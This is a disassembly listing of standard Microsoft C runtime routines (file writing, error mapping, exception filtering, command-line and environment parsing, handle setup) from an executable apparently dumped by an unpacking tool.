test byte ptr [eax+4], 80h
jz loc_41CDF7
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_41CE2F
loc_41CD48: ; CODE XREF: sub_41CCC7+F5�j
lea eax, [ebp+var_414]
loc_41CD4E: ; CODE XREF: sub_41CCC7+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_41CD82
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_41CD6D
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_41CD6D: ; CODE XREF: sub_41CCC7+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_41CD4E
loc_41CD82: ; CODE XREF: sub_41CCC7+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call dword_421070 ; WriteFile
test eax, eax
jz short loc_41CDEC
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_41CDBE
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
cmp eax, [ebp+arg_8]
jb short loc_41CD48
loc_41CDBE: ; CODE XREF: sub_41CCC7+EA�j
; sub_41CCC7+12E�j
xor edi, edi
loc_41CDC0: ; CODE XREF: sub_41CCC7+150�j
; sub_41CCC7+15B�j
mov eax, [ebp+var_8]
cmp eax, edi
jnz loc_41CE56
cmp [ebp+arg_0], edi
jz short loc_41CE2F
push 5
pop eax
cmp [ebp+arg_0], eax
jnz short loc_41CE24
mov dword_46BB04, 9
mov dword_46BB08, eax
jmp loc_41CE6C
; ---------------------------------------------------------------------------
loc_41CDEC: ; CODE XREF: sub_41CCC7+E0�j
call dword_421088 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41CDBE
; ---------------------------------------------------------------------------
loc_41CDF7: ; CODE XREF: sub_41CCC7+69�j
lea ecx, [ebp+var_C]
push edi
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push dword ptr [eax]
call dword_421070 ; WriteFile
test eax, eax
jz short loc_41CE19
mov eax, [ebp+var_C]
mov [ebp+arg_0], edi
mov [ebp+var_8], eax
jmp short loc_41CDC0
; ---------------------------------------------------------------------------
loc_41CE19: ; CODE XREF: sub_41CCC7+145�j
call dword_421088 ; RtlGetLastWin32Error
mov [ebp+arg_0], eax
jmp short loc_41CDC0
; ---------------------------------------------------------------------------
loc_41CE24: ; CODE XREF: sub_41CCC7+10F�j
push [ebp+arg_0]
call sub_41CE74
pop ecx
jmp short loc_41CE6C
; ---------------------------------------------------------------------------
loc_41CE2F: ; CODE XREF: sub_41CCC7+7B�j
; sub_41CCC7+107�j
mov eax, [ebx]
test byte ptr [eax+esi+4], 40h
jz short loc_41CE44
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 1Ah
jz loc_41CD11
loc_41CE44: ; CODE XREF: sub_41CCC7+16F�j
mov dword_46BB04, 1Ch
mov dword_46BB08, edi
jmp short loc_41CE6C
; ---------------------------------------------------------------------------
loc_41CE56: ; CODE XREF: sub_41CCC7+FE�j
sub eax, [ebp+var_10]
jmp short loc_41CE6F
; ---------------------------------------------------------------------------
loc_41CE5B: ; CODE XREF: sub_41CCC7+15�j
; sub_41CCC7+37�j
and dword_46BB08, 0
mov dword_46BB04, 9
loc_41CE6C: ; CODE XREF: sub_41CCC7+120�j
; sub_41CCC7+166�j ...
or eax, 0FFFFFFFFh
loc_41CE6F: ; CODE XREF: sub_41CCC7+4C�j
; sub_41CCC7+192�j
pop edi
pop esi
pop ebx
leave
retn
sub_41CCC7 endp
; =============== S U B R O U T I N E =======================================
sub_41CE74 proc near ; CODE XREF: sub_417729+16�p
; sub_41791C+1D�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
xor edx, edx
mov dword_46BB08, ecx
mov eax, offset dword_43A880
loc_41CE85: ; CODE XREF: sub_41CE74+1E�j
cmp ecx, [eax]
jz short loc_41CEA9
add eax, 8
inc edx
cmp eax, offset dword_43A9E8
jl short loc_41CE85
cmp ecx, 13h
jb short loc_41CEB6
cmp ecx, 24h
ja short loc_41CEB6
mov dword_46BB04, 0Dh
retn
; ---------------------------------------------------------------------------
loc_41CEA9: ; CODE XREF: sub_41CE74+13�j
mov eax, dword_43A884[edx*8]
mov dword_46BB04, eax
retn
; ---------------------------------------------------------------------------
loc_41CEB6: ; CODE XREF: sub_41CE74+23�j
; sub_41CE74+28�j
cmp ecx, 0BCh
jb short loc_41CED0
cmp ecx, 0CAh
mov dword_46BB04, 8
jbe short locret_41CEDA
loc_41CED0: ; CODE XREF: sub_41CE74+48�j
mov dword_46BB04, 16h
locret_41CEDA: ; CODE XREF: sub_41CE74+5A�j
retn
sub_41CE74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CEDB proc near ; CODE XREF: .text:00417BFB�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_41D01C
test eax, eax
pop ecx
jz loc_41D010
mov ebx, [eax+8]
test ebx, ebx
jz loc_41D010
cmp ebx, 5
jnz short loc_41CF0C
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_41D019
; ---------------------------------------------------------------------------
loc_41CF0C: ; CODE XREF: sub_41CEDB+23�j
cmp ebx, 1
jz loc_41D00B
mov ecx, dword_46BBB8
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_46BBB8, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_41CFFB
mov ecx, dword_43AA60
mov edx, dword_43AA64
add edx, ecx
push esi
cmp ecx, edx
jge short loc_41CF5B
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:43A9F0h[esi*4]
loc_41CF52: ; CODE XREF: sub_41CEDB+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_41CF52
loc_41CF5B: ; CODE XREF: sub_41CEDB+69�j
mov eax, [eax]
mov esi, dword_43AA6C
cmp eax, 0C000008Eh
jnz short loc_41CF76
mov dword_43AA6C, 83h
jmp short loc_41CFE6
; ---------------------------------------------------------------------------
loc_41CF76: ; CODE XREF: sub_41CEDB+8D�j
cmp eax, 0C0000090h
jnz short loc_41CF89
mov dword_43AA6C, 81h
jmp short loc_41CFE6
; ---------------------------------------------------------------------------
loc_41CF89: ; CODE XREF: sub_41CEDB+A0�j
cmp eax, 0C0000091h
jnz short loc_41CF9C
mov dword_43AA6C, 84h
jmp short loc_41CFE6
; ---------------------------------------------------------------------------
loc_41CF9C: ; CODE XREF: sub_41CEDB+B3�j
cmp eax, 0C0000093h
jnz short loc_41CFAF
mov dword_43AA6C, 85h
jmp short loc_41CFE6
; ---------------------------------------------------------------------------
loc_41CFAF: ; CODE XREF: sub_41CEDB+C6�j
cmp eax, 0C000008Dh
jnz short loc_41CFC2
mov dword_43AA6C, 82h
jmp short loc_41CFE6
; ---------------------------------------------------------------------------
loc_41CFC2: ; CODE XREF: sub_41CEDB+D9�j
cmp eax, 0C000008Fh
jnz short loc_41CFD5
mov dword_43AA6C, 86h
jmp short loc_41CFE6
; ---------------------------------------------------------------------------
loc_41CFD5: ; CODE XREF: sub_41CEDB+EC�j
cmp eax, 0C0000092h
jnz short loc_41CFE6
mov dword_43AA6C, 8Ah
loc_41CFE6: ; CODE XREF: sub_41CEDB+99�j
; sub_41CEDB+AC�j ...
push dword_43AA6C
push 8
call ebx
pop ecx
mov dword_43AA6C, esi
pop ecx
pop esi
jmp short loc_41D003
; ---------------------------------------------------------------------------
loc_41CFFB: ; CODE XREF: sub_41CEDB+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_41D003: ; CODE XREF: sub_41CEDB+11E�j
mov eax, [ebp+arg_0]
mov dword_46BBB8, eax
loc_41D00B: ; CODE XREF: sub_41CEDB+34�j
or eax, 0FFFFFFFFh
jmp short loc_41D019
; ---------------------------------------------------------------------------
loc_41D010: ; CODE XREF: sub_41CEDB+F�j
; sub_41CEDB+1A�j
push [ebp+arg_4]
call dword_4211A4 ; UnhandledExceptionFilter
loc_41D019: ; CODE XREF: sub_41CEDB+2C�j
; sub_41CEDB+133�j
pop ebx
pop ebp
retn
sub_41CEDB endp
; =============== S U B R O U T I N E =======================================
sub_41D01C proc near ; CODE XREF: sub_41CEDB+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_43AA68
cmp dword_43A9E8, edx
push esi
mov eax, offset dword_43A9E8
jz short loc_41D049
lea esi, [ecx+ecx*2]
lea esi, ds:43A9E8h[esi*4]
loc_41D03E: ; CODE XREF: sub_41D01C+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41D049
cmp [eax], edx
jnz short loc_41D03E
loc_41D049: ; CODE XREF: sub_41D01C+16�j
; sub_41D01C+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:43A9E8h[ecx*4]
cmp eax, ecx
jnb short loc_41D05C
cmp [eax], edx
jz short locret_41D05E
loc_41D05C: ; CODE XREF: sub_41D01C+3A�j
xor eax, eax
locret_41D05E: ; CODE XREF: sub_41D01C+3E�j
retn
sub_41D01C endp
; =============== S U B R O U T I N E =======================================
sub_41D05F proc near ; CODE XREF: .text:00417BBD�p
cmp dword_46D174, 0
jnz short loc_41D06D
call sub_41CC21
loc_41D06D: ; CODE XREF: sub_41D05F+7�j
push esi
mov esi, dword_46D16C
mov al, [esi]
cmp al, 22h
jnz short loc_41D09F
loc_41D07A: ; CODE XREF: sub_41D05F+33�j
; sub_41D05F+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41D097
test al, al
jz short loc_41D097
movzx eax, al
push eax
call sub_41EF4C
test eax, eax
pop ecx
jz short loc_41D07A
inc esi
jmp short loc_41D07A
; ---------------------------------------------------------------------------
loc_41D097: ; CODE XREF: sub_41D05F+21�j
; sub_41D05F+25�j
cmp byte ptr [esi], 22h
jnz short loc_41D0A9
loc_41D09C: ; CODE XREF: sub_41D05F+52�j
inc esi
jmp short loc_41D0A9
; ---------------------------------------------------------------------------
loc_41D09F: ; CODE XREF: sub_41D05F+19�j
cmp al, 20h
jbe short loc_41D0A9
loc_41D0A3: ; CODE XREF: sub_41D05F+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41D0A3
loc_41D0A9: ; CODE XREF: sub_41D05F+3B�j
; sub_41D05F+3E�j ...
mov al, [esi]
test al, al
jz short loc_41D0B3
cmp al, 20h
jbe short loc_41D09C
loc_41D0B3: ; CODE XREF: sub_41D05F+4E�j
mov eax, esi
pop esi
retn
sub_41D05F endp
; =============== S U B R O U T I N E =======================================
sub_41D0B7 proc near ; CODE XREF: .text:00417BA6�p
push ebx
xor ebx, ebx
cmp dword_46D174, ebx
push esi
push edi
jnz short loc_41D0C9
call sub_41CC21
loc_41D0C9: ; CODE XREF: sub_41D0B7+B�j
mov esi, dword_46BB50
xor edi, edi
loc_41D0D1: ; CODE XREF: sub_41D0B7+30�j
mov al, [esi]
cmp al, bl
jz short loc_41D0E9
cmp al, 3Dh
jz short loc_41D0DC
inc edi
loc_41D0DC: ; CODE XREF: sub_41D0B7+22�j
push esi
call sub_415B10
pop ecx
lea esi, [esi+eax+1]
jmp short loc_41D0D1
; ---------------------------------------------------------------------------
loc_41D0E9: ; CODE XREF: sub_41D0B7+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_415BE9
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_46BB2C, esi
jnz short loc_41D10B
push 9
call sub_417C0E
pop ecx
loc_41D10B: ; CODE XREF: sub_41D0B7+4A�j
mov edi, dword_46BB50
cmp [edi], bl
jz short loc_41D14E
push ebp
loc_41D116: ; CODE XREF: sub_41D0B7+94�j
push edi
call sub_415B10
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_41D147
push ebp
call sub_415BE9
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_41D13A
push 9
call sub_417C0E
pop ecx
loc_41D13A: ; CODE XREF: sub_41D0B7+79�j
push edi
push dword ptr [esi]
call sub_415A20
pop ecx
add esi, 4
pop ecx
loc_41D147: ; CODE XREF: sub_41D0B7+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_41D116
pop ebp
loc_41D14E: ; CODE XREF: sub_41D0B7+5C�j
push dword_46BB50
call sub_415C9B
pop ecx
mov dword_46BB50, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_46D170, 1
pop ebx
retn
sub_41D0B7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D170 proc near ; CODE XREF: .text:00417BA1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_46D174, ebx
push esi
push edi
jnz short loc_41D187
call sub_41CC21
loc_41D187: ; CODE XREF: sub_41D170+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call dword_42107C ; GetModuleFileNameA
mov eax, dword_46D16C
mov off_46BB3C, esi
mov edi, esi
cmp [eax], bl
jz short loc_41D1AC
mov edi, eax
loc_41D1AC: ; CODE XREF: sub_41D170+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_41D209
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_415BE9
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_41D1DC
push 8
call sub_417C0E
pop ecx
loc_41D1DC: ; CODE XREF: sub_41D170+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_41D209
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_46BB24, esi
pop edi
pop esi
mov dword_46BB20, eax
pop ebx
leave
retn
sub_41D170 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D209 proc near ; CODE XREF: sub_41D170+47�p
; sub_41D170+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_41D233
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41D233: ; CODE XREF: sub_41D209+20�j
cmp byte ptr [eax], 22h
jnz short loc_41D27C
loc_41D238: ; CODE XREF: sub_41D209+58�j
; sub_41D209+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41D26A
test dl, dl
jz short loc_41D26A
movzx edx, dl
test byte_46D041[edx], 4
jz short loc_41D25D
inc dword ptr [ecx]
test esi, esi
jz short loc_41D25D
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_41D25D: ; CODE XREF: sub_41D209+46�j
; sub_41D209+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D238
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41D238
; ---------------------------------------------------------------------------
loc_41D26A: ; CODE XREF: sub_41D209+36�j
; sub_41D209+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D274
and byte ptr [esi], 0
inc esi
loc_41D274: ; CODE XREF: sub_41D209+65�j
cmp byte ptr [eax], 22h
jnz short loc_41D2BF
inc eax
jmp short loc_41D2BF
; ---------------------------------------------------------------------------
loc_41D27C: ; CODE XREF: sub_41D209+2D�j
; sub_41D209+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D287
mov dl, [eax]
mov [esi], dl
inc esi
loc_41D287: ; CODE XREF: sub_41D209+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_46D041[ebx], 4
jz short loc_41D2A2
inc dword ptr [ecx]
test esi, esi
jz short loc_41D2A1
mov bl, [eax]
mov [esi], bl
inc esi
loc_41D2A1: ; CODE XREF: sub_41D209+91�j
inc eax
loc_41D2A2: ; CODE XREF: sub_41D209+8B�j
cmp dl, 20h
jz short loc_41D2B0
test dl, dl
jz short loc_41D2B4
cmp dl, 9
jnz short loc_41D27C
loc_41D2B0: ; CODE XREF: sub_41D209+9C�j
test dl, dl
jnz short loc_41D2B7
loc_41D2B4: ; CODE XREF: sub_41D209+A0�j
dec eax
jmp short loc_41D2BF
; ---------------------------------------------------------------------------
loc_41D2B7: ; CODE XREF: sub_41D209+A9�j
test esi, esi
jz short loc_41D2BF
and byte ptr [esi-1], 0
loc_41D2BF: ; CODE XREF: sub_41D209+6E�j
; sub_41D209+71�j ...
and [ebp+arg_10], 0
loc_41D2C3: ; CODE XREF: sub_41D209+19E�j
cmp byte ptr [eax], 0
jz loc_41D3AC
loc_41D2CC: ; CODE XREF: sub_41D209+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41D2D8
cmp dl, 9
jnz short loc_41D2DB
loc_41D2D8: ; CODE XREF: sub_41D209+C8�j
inc eax
jmp short loc_41D2CC
; ---------------------------------------------------------------------------
loc_41D2DB: ; CODE XREF: sub_41D209+CD�j
cmp byte ptr [eax], 0
jz loc_41D3AC
test edi, edi
jz short loc_41D2F0
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41D2F0: ; CODE XREF: sub_41D209+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_41D2F5: ; CODE XREF: sub_41D209+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_41D2FE: ; CODE XREF: sub_41D209+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_41D307
inc eax
inc ebx
jmp short loc_41D2FE
; ---------------------------------------------------------------------------
loc_41D307: ; CODE XREF: sub_41D209+F8�j
cmp byte ptr [eax], 22h
jnz short loc_41D338
test bl, 1
jnz short loc_41D336
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_41D325
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_41D325
mov eax, edx
jmp short loc_41D328
; ---------------------------------------------------------------------------
loc_41D325: ; CODE XREF: sub_41D209+10D�j
; sub_41D209+116�j
mov [ebp+arg_0], edi
loc_41D328: ; CODE XREF: sub_41D209+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_41D336: ; CODE XREF: sub_41D209+106�j
shr ebx, 1
loc_41D338: ; CODE XREF: sub_41D209+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_41D34D
inc ebx
loc_41D340: ; CODE XREF: sub_41D209+142�j
test esi, esi
jz short loc_41D348
mov byte ptr [esi], 5Ch
inc esi
loc_41D348: ; CODE XREF: sub_41D209+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_41D340
loc_41D34D: ; CODE XREF: sub_41D209+134�j
mov dl, [eax]
test dl, dl
jz short loc_41D39D
cmp [ebp+arg_10], 0
jnz short loc_41D363
cmp dl, 20h
jz short loc_41D39D
cmp dl, 9
jz short loc_41D39D
loc_41D363: ; CODE XREF: sub_41D209+14E�j
cmp [ebp+arg_0], 0
jz short loc_41D397
test esi, esi
jz short loc_41D386
movzx ebx, dl
test byte_46D041[ebx], 4
jz short loc_41D37F
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_41D37F: ; CODE XREF: sub_41D209+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41D395
; ---------------------------------------------------------------------------
loc_41D386: ; CODE XREF: sub_41D209+162�j
movzx edx, dl
test byte_46D041[edx], 4
jz short loc_41D395
inc eax
inc dword ptr [ecx]
loc_41D395: ; CODE XREF: sub_41D209+17B�j
; sub_41D209+187�j
inc dword ptr [ecx]
loc_41D397: ; CODE XREF: sub_41D209+15E�j
inc eax
jmp loc_41D2F5
; ---------------------------------------------------------------------------
loc_41D39D: ; CODE XREF: sub_41D209+148�j
; sub_41D209+153�j ...
test esi, esi
jz short loc_41D3A5
and byte ptr [esi], 0
inc esi
loc_41D3A5: ; CODE XREF: sub_41D209+196�j
inc dword ptr [ecx]
jmp loc_41D2C3
; ---------------------------------------------------------------------------
loc_41D3AC: ; CODE XREF: sub_41D209+BD�j
; sub_41D209+D5�j
test edi, edi
jz short loc_41D3B3
and dword ptr [edi], 0
loc_41D3B3: ; CODE XREF: sub_41D209+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_41D209 endp
; =============== S U B R O U T I N E =======================================
sub_41D3BD proc near ; CODE XREF: .text:00417B97�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_46BCC0
push ebx
push ebp
mov ebp, dword_42103C
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_41D40B
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41D3EC
mov dword_46BCC0, 1
jmp short loc_41D414
; ---------------------------------------------------------------------------
loc_41D3EC: ; CODE XREF: sub_41D3BD+21�j
call dword_421040 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz loc_41D4E6
mov dword_46BCC0, 2
jmp loc_41D49A
; ---------------------------------------------------------------------------
loc_41D40B: ; CODE XREF: sub_41D3BD+19�j
cmp eax, 1
jnz loc_41D495
loc_41D414: ; CODE XREF: sub_41D3BD+2D�j
cmp esi, ebx
jnz short loc_41D424
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_41D4E6
loc_41D424: ; CODE XREF: sub_41D3BD+59�j
cmp [esi], bx
mov eax, esi
jz short loc_41D439
loc_41D42B: ; CODE XREF: sub_41D3BD+73�j
; sub_41D3BD+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_41D42B
inc eax
inc eax
cmp [eax], bx
jnz short loc_41D42B
loc_41D439: ; CODE XREF: sub_41D3BD+6C�j
sub eax, esi
mov edi, dword_421138
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41D48A
push ebp
call sub_415BE9
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41D48A
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41D486
push [esp+18h+var_8]
call sub_415C9B
pop ecx
mov [esp+18h+var_8], ebx
loc_41D486: ; CODE XREF: sub_41D3BD+B9�j
mov ebx, [esp+18h+var_8]
loc_41D48A: ; CODE XREF: sub_41D3BD+99�j
; sub_41D3BD+A8�j
push esi
call dword_421044 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41D4E8
; ---------------------------------------------------------------------------
loc_41D495: ; CODE XREF: sub_41D3BD+51�j
cmp eax, 2
jnz short loc_41D4E6
loc_41D49A: ; CODE XREF: sub_41D3BD+49�j
cmp edi, ebx
jnz short loc_41D4AA
call dword_421040 ; GetEnvironmentStringsA
mov edi, eax
cmp edi, ebx
jz short loc_41D4E6
loc_41D4AA: ; CODE XREF: sub_41D3BD+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_41D4BA
loc_41D4B0: ; CODE XREF: sub_41D3BD+F6�j
; sub_41D3BD+FB�j
inc eax
cmp [eax], bl
jnz short loc_41D4B0
inc eax
cmp [eax], bl
jnz short loc_41D4B0
loc_41D4BA: ; CODE XREF: sub_41D3BD+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_415BE9
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41D4D0
xor esi, esi
jmp short loc_41D4DB
; ---------------------------------------------------------------------------
loc_41D4D0: ; CODE XREF: sub_41D3BD+10D�j
push ebp
push edi
push esi
call sub_4153F0
add esp, 0Ch
loc_41D4DB: ; CODE XREF: sub_41D3BD+111�j
push edi
call dword_4211A8 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_41D4E8
; ---------------------------------------------------------------------------
loc_41D4E6: ; CODE XREF: sub_41D3BD+39�j
; sub_41D3BD+61�j ...
xor eax, eax
loc_41D4E8: ; CODE XREF: sub_41D3BD+D6�j
; sub_41D3BD+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41D3BD endp
; =============== S U B R O U T I N E =======================================
sub_41D4EF proc near ; CODE XREF: .text:00417B87�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_415BE9
mov esi, eax
pop ecx
test esi, esi
jnz short loc_41D50F
push 1Bh
call sub_417C0E
pop ecx
loc_41D50F: ; CODE XREF: sub_41D4EF+16�j
mov dword_46CE20, esi
mov dword_46CF20, 20h
lea eax, [esi+100h]
loc_41D525: ; CODE XREF: sub_41D4EF+52�j
cmp esi, eax
jnb short loc_41D543
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, dword_46CE20
add esi, 8
add eax, 100h
jmp short loc_41D525
; ---------------------------------------------------------------------------
loc_41D543: ; CODE XREF: sub_41D4EF+38�j
lea eax, [esp+54h+var_44]
push eax
call dword_421164 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_41D61F
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_41D61F
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_41D579
mov esi, eax
loc_41D579: ; CODE XREF: sub_41D4EF+86�j
cmp dword_46CF20, esi
jge short loc_41D5D3
mov edi, offset dword_46CE24
loc_41D586: ; CODE XREF: sub_41D4EF+DA�j
push 100h
call sub_415BE9
test eax, eax
pop ecx
jz short loc_41D5CD
add dword_46CF20, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_41D5A4: ; CODE XREF: sub_41D4EF+CF�j
cmp eax, ecx
jnb short loc_41D5C0
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_41D5A4
; ---------------------------------------------------------------------------
loc_41D5C0: ; CODE XREF: sub_41D4EF+B7�j
add edi, 4
cmp dword_46CF20, esi
jl short loc_41D586
jmp short loc_41D5D3
; ---------------------------------------------------------------------------
loc_41D5CD: ; CODE XREF: sub_41D4EF+A4�j
mov esi, dword_46CF20
loc_41D5D3: ; CODE XREF: sub_41D4EF+90�j
; sub_41D4EF+DC�j
xor edi, edi
test esi, esi
jle short loc_41D61F
loc_41D5D9: ; CODE XREF: sub_41D4EF+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41D616
mov cl, [ebp+0]
test cl, 1
jz short loc_41D616
test cl, 8
jnz short loc_41D5F8
push eax
call dword_421030 ; GetFileType
test eax, eax
jz short loc_41D616
loc_41D5F8: ; CODE XREF: sub_41D4EF+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, dword_46CE20[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41D616: ; CODE XREF: sub_41D4EF+EF�j
; sub_41D4EF+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41D5D9
loc_41D61F: ; CODE XREF: sub_41D4EF+65�j
; sub_41D4EF+71�j ...
xor ebx, ebx
loc_41D621: ; CODE XREF: sub_41D4EF+195�j
mov eax, dword_46CE20
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_41D67C
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41D63C
push 0FFFFFFF6h
pop eax
jmp short loc_41D646
; ---------------------------------------------------------------------------
loc_41D63C: ; CODE XREF: sub_41D4EF+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41D646: ; CODE XREF: sub_41D4EF+14B�j
push eax
call dword_421034 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41D66B
push edi
call dword_421030 ; GetFileType
test eax, eax
jz short loc_41D66B
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_41D671
loc_41D66B: ; CODE XREF: sub_41D4EF+163�j
; sub_41D4EF+16E�j
or byte ptr [esi+4], 40h
jmp short loc_41D680
; ---------------------------------------------------------------------------
loc_41D671: ; CODE XREF: sub_41D4EF+17A�j
cmp eax, 3
jnz short loc_41D680
or byte ptr [esi+4], 8
jmp short loc_41D680
; ---------------------------------------------------------------------------
loc_41D67C: ; CODE XREF: sub_41D4EF+13E�j
or byte ptr [esi+4], 80h
loc_41D680: ; CODE XREF: sub_41D4EF+180�j
; sub_41D4EF+185�j ...
inc ebx
cmp ebx, 3
jl short loc_41D621
push dword_46CF20
call dword_421038 ; SetHandleCount
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
